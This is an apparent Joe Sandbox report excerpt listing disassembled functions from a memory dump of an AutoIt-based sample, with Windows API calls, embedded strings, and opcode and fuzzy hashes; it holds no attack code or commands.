                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 4ce68b8fc7c217c59dd742707f28cf243f1ab1f11819dc7232b78aa6744b236d
                                              • Instruction ID: c0e60bc0aef4f8b96d263b7a8e519667e89beba16c3a11acdebea3277a9c064d
                                              • Opcode Fuzzy Hash: 4ce68b8fc7c217c59dd742707f28cf243f1ab1f11819dc7232b78aa6744b236d
                                              • Instruction Fuzzy Hash: C7618931164601DFDB25AF19D988B3ABBF1FB44316F2085E9E18687A60CB75BC90DF90
                                              Function 00B32581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              • GetSysColor.USER32(0000000F), ref: 00B325AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: b5ba33a40c3d758f071f149240bae6d6e309ccebf730e587b4f683e182014f3e
                                              • Instruction ID: 3634e901716a4e40258351c00475058912a610f7f855036956d476afe940fd21
                                              • Opcode Fuzzy Hash: b5ba33a40c3d758f071f149240bae6d6e309ccebf730e587b4f683e182014f3e
                                              • Instruction Fuzzy Hash: AD41B131004140EFDB256F289C99BB93BA5EF1A335F2942E1FDA68B1E1CB348D41DB21
                                              Function 00B429BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B50B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B42A3E,?,00008000), ref: 00B50BA7
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B42ADF
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B42C2C
                                                • Part of subcall function 00B43EBE: _wcscpy.LIBCMT ref: 00B43EF6
                                                • Part of subcall function 00B5386D: _iswctype.LIBCMT ref: 00B53875
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-3738523708
                                              • Opcode ID: db03ef046bba3ba051e74af754e314147e6e103720a8003206fa483abf445d6e
                                              • Instruction ID: cc9b7c7fd1748b5b4df79ea90ba7f32281670a6b6c46b048d43e699663a2fb6f
                                              • Opcode Fuzzy Hash: db03ef046bba3ba051e74af754e314147e6e103720a8003206fa483abf445d6e
                                              • Instruction Fuzzy Hash: 9C02F8305083419FC724EF24C881AAFBBE5FF99350F0449ADF499972A2DB30DA49DB42
                                              Function 00B9AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,00BC0980), ref: 00B9AF4E
                                              • GetDriveTypeW.KERNEL32(00000061,00BEB5F0,00000061), ref: 00B9B018
                                              • _wcscpy.LIBCMT ref: 00B9B042
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 8071e3ac3ac6f189d4f254b9f2250df197c57bf7e1846fd1a5cf7f32d1ab3608
                                              • Instruction ID: 728d878d4cf7a3a303c46277aae4a308437d779de0937fa0d9126593e7a440b4
                                              • Opcode Fuzzy Hash: 8071e3ac3ac6f189d4f254b9f2250df197c57bf7e1846fd1a5cf7f32d1ab3608
                                              • Instruction Fuzzy Hash: 7951D2311183059BCB10EF14D991FABB7E5FF94704F2048ADF895972A2DB31ED09CA92
                                              Function 00B34D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: b3219f8d28da9bbc77b96de0515174d9b3c1c335a6f0ad6ed470dbc4d1963e4f
                                              • Instruction ID: 8e3ba9493ba1a5b632c451160b8b9673446baac379a590c0fda47508c6d73b03
                                              • Opcode Fuzzy Hash: b3219f8d28da9bbc77b96de0515174d9b3c1c335a6f0ad6ed470dbc4d1963e4f
                                              • Instruction Fuzzy Hash: 9A41B671A08209AFDB24DF78D981F7A73E8EB45300F3448EEE549D7291EB75AD458B10
                                              Function 00BB7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB778F
                                              • CreateMenu.USER32 ref: 00BB77AA
                                              • SetMenu.USER32(?,00000000), ref: 00BB77B9
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB7846
                                              • IsMenu.USER32(?), ref: 00BB785C
                                              • CreatePopupMenu.USER32 ref: 00BB7866
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB7893
                                              • DrawMenuBar.USER32 ref: 00BB789B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: ff2881bfffea13bf6b0af4ba95ea2311a8666c0c131d607139fb367e980c0252
                                              • Instruction ID: d244d7ae2fc62bde93ca1070d630585565f64068a4aa6934406db4d80ba34e6f
                                              • Opcode Fuzzy Hash: ff2881bfffea13bf6b0af4ba95ea2311a8666c0c131d607139fb367e980c0252
                                              • Instruction Fuzzy Hash: 8B412374A10209EFDB10DF65D888EEABBF5FF89310F1441A9E946A7360DB70A910DF50
                                              Function 00BB7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BB7B83
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BB7B8A
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BB7B9D
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BB7BA5
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BB7BB0
                                              • DeleteDC.GDI32(00000000), ref: 00BB7BB9
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB7BC3
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BB7BD7
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BB7BE3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 0ea6613127f38ea03c9cf0bd66f079aa86908a5aaec4621bb40f502e054858bb
                                              • Instruction ID: 35653084a04dadf88226bdb42a0575221f5e8cd0b316714361164d6ec39d3508
                                              • Opcode Fuzzy Hash: 0ea6613127f38ea03c9cf0bd66f079aa86908a5aaec4621bb40f502e054858bb
                                              • Instruction Fuzzy Hash: 1E318B32154219EBDF21AF64CC49FEB3BA9FF4D324F110255FA55A61A0CBB1D820DBA0
                                              Function 00B57030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B5706B
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • __gmtime64_s.LIBCMT ref: 00B57104
                                              • __gmtime64_s.LIBCMT ref: 00B5713A
                                              • __gmtime64_s.LIBCMT ref: 00B57157
                                              • __allrem.LIBCMT ref: 00B571AD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B571C9
                                              • __allrem.LIBCMT ref: 00B571E0
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B571FE
                                              • __allrem.LIBCMT ref: 00B57215
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B57233
                                              • __invoke_watson.LIBCMT ref: 00B572A4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction ID: e54997e331042a08c094fc5fb2df633545ab9c3ba01ac634147e4637d77d7c6c
                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction Fuzzy Hash: 2F711571B44B16ABD7149A79DC81B6AB3E8EF01321F1442EAF914E76C1EF70D9488B90
                                              Function 00B92CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B92CE9
                                              • GetMenuItemInfoW.USER32(00BF7890,000000FF,00000000,00000030), ref: 00B92D4A
                                              • SetMenuItemInfoW.USER32(00BF7890,00000004,00000000,00000030), ref: 00B92D80
                                              • Sleep.KERNEL32(000001F4), ref: 00B92D92
                                              • GetMenuItemCount.USER32(?), ref: 00B92DD6
                                              • GetMenuItemID.USER32(?,00000000), ref: 00B92DF2
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00B92E1C
                                              • GetMenuItemID.USER32(?,?), ref: 00B92E61
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B92EA7
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92EBB
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92EDC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 31590b38866965a536db405c99d91a8ea6f59927944f646a45165aca6ef1a4d2
                                              • Instruction ID: 0596e0fd451db0b9be672acca7234df6ed9585796fc393164fc5941e5a203e2a
                                              • Opcode Fuzzy Hash: 31590b38866965a536db405c99d91a8ea6f59927944f646a45165aca6ef1a4d2
                                              • Instruction Fuzzy Hash: B06146B0900649AFDF21DF64D9C8ABEBBE9EB45304F1444A9E841A7251DB31AE05DB21
                                              Function 00BB7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BB75CA
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BB75CD
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB75F1
                                              • _memset.LIBCMT ref: 00BB7602
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB7614
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BB768C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 55553eba4174dd2c8ce5c479f0f4735210a1e6b272060d5658adb48424c49952
                                              • Instruction ID: fc04e213b3d23fb6697a2f907142776e075d955d95dd382afde1acacbc1ca702
                                              • Opcode Fuzzy Hash: 55553eba4174dd2c8ce5c479f0f4735210a1e6b272060d5658adb48424c49952
                                              • Instruction Fuzzy Hash: E6618A75944208AFDB10DFA8CC85EFE77F8EB49710F100199FA15A72A1CBB0AE45DB60
                                              Function 00B877B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B877DD
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00B87836
                                              • VariantInit.OLEAUT32(?), ref: 00B87848
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B87868
                                              • VariantCopy.OLEAUT32(?,?), ref: 00B878BB
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B878CF
                                              • VariantClear.OLEAUT32(?), ref: 00B878E4
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00B878F1
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B878FA
                                              • VariantClear.OLEAUT32(?), ref: 00B8790C
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B87917
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 6c578c46ec43e87cea87018ee5b31d6aa97834c3029818deea0eb1be3f323d22
                                              • Instruction ID: d4f8f20e81f0586e3b45dcef5def7168fe3042015082eff0238907ee941b9e9c
                                              • Opcode Fuzzy Hash: 6c578c46ec43e87cea87018ee5b31d6aa97834c3029818deea0eb1be3f323d22
                                              • Instruction Fuzzy Hash: 52414E35A14119EFCB04EFA4D848DAEBBF9EF48304F1080A9E955A7361CB30E945CFA0
                                              Function 00BA8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CoInitialize.OLE32 ref: 00BA8AED
                                              • CoUninitialize.OLE32 ref: 00BA8AF8
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00BC3BBC,?), ref: 00BA8B58
                                              • IIDFromString.OLE32(?,?), ref: 00BA8BCB
                                              • VariantInit.OLEAUT32(?), ref: 00BA8C65
                                              • VariantClear.OLEAUT32(?), ref: 00BA8CC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 00df092e0c2a7f2e0ce783f578943d407e8e392e8a14480e363f933574b754c6
                                              • Instruction ID: c7647c07536d7b340688af01d159c1c59a8b47192489802cbe893317e1215f6d
                                              • Opcode Fuzzy Hash: 00df092e0c2a7f2e0ce783f578943d407e8e392e8a14480e363f933574b754c6
                                              • Instruction Fuzzy Hash: 86618070208711AFD710EF14D889F5AB7E4EF4A714F104899F9859B6A1DB70ED48CBA2
                                              Function 00B9BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9BB13
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B9BB89
                                              • GetLastError.KERNEL32 ref: 00B9BB93
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00B9BC00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: e80f48d1a674d6d9099cbe1f9f5650c3bd39aadbb6aa8067a152678640cb053b
                                              • Instruction ID: 80f083a60325a8f39e368341165074f5173b7a226bc94b4dbadc5585274743e8
                                              • Opcode Fuzzy Hash: e80f48d1a674d6d9099cbe1f9f5650c3bd39aadbb6aa8067a152678640cb053b
                                              • Instruction Fuzzy Hash: 6E31A135A00209AFCB10EF69D995EAEB7F8EF44304F1481E9E905972E5DB709D41CB91
                                              Function 00B89B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B89BCC
                                              • GetDlgCtrlID.USER32 ref: 00B89BD7
                                              • GetParent.USER32 ref: 00B89BF3
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B89BF6
                                              • GetDlgCtrlID.USER32(?), ref: 00B89BFF
                                              • GetParent.USER32(?), ref: 00B89C1B
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B89C1E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: dcaf2ac6926f032f6fe98b130c09c4c72da07c7d6862309b6ba018dc167c4ec2
                                              • Instruction ID: 45d5cd8dd499619ed2383973ec9e6523840bfdea88b752858b87d218a3b63912
                                              • Opcode Fuzzy Hash: dcaf2ac6926f032f6fe98b130c09c4c72da07c7d6862309b6ba018dc167c4ec2
                                              • Instruction Fuzzy Hash: 1F21BD74E00208ABCF04BFA5CC85EFEBBE9EF99310F140295F961972A1DB755964DB20
                                              Function 00B89C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B89CB5
                                              • GetDlgCtrlID.USER32 ref: 00B89CC0
                                              • GetParent.USER32 ref: 00B89CDC
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B89CDF
                                              • GetDlgCtrlID.USER32(?), ref: 00B89CE8
                                              • GetParent.USER32(?), ref: 00B89D04
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B89D07
                                              Strings
                                              Memory Dump Source
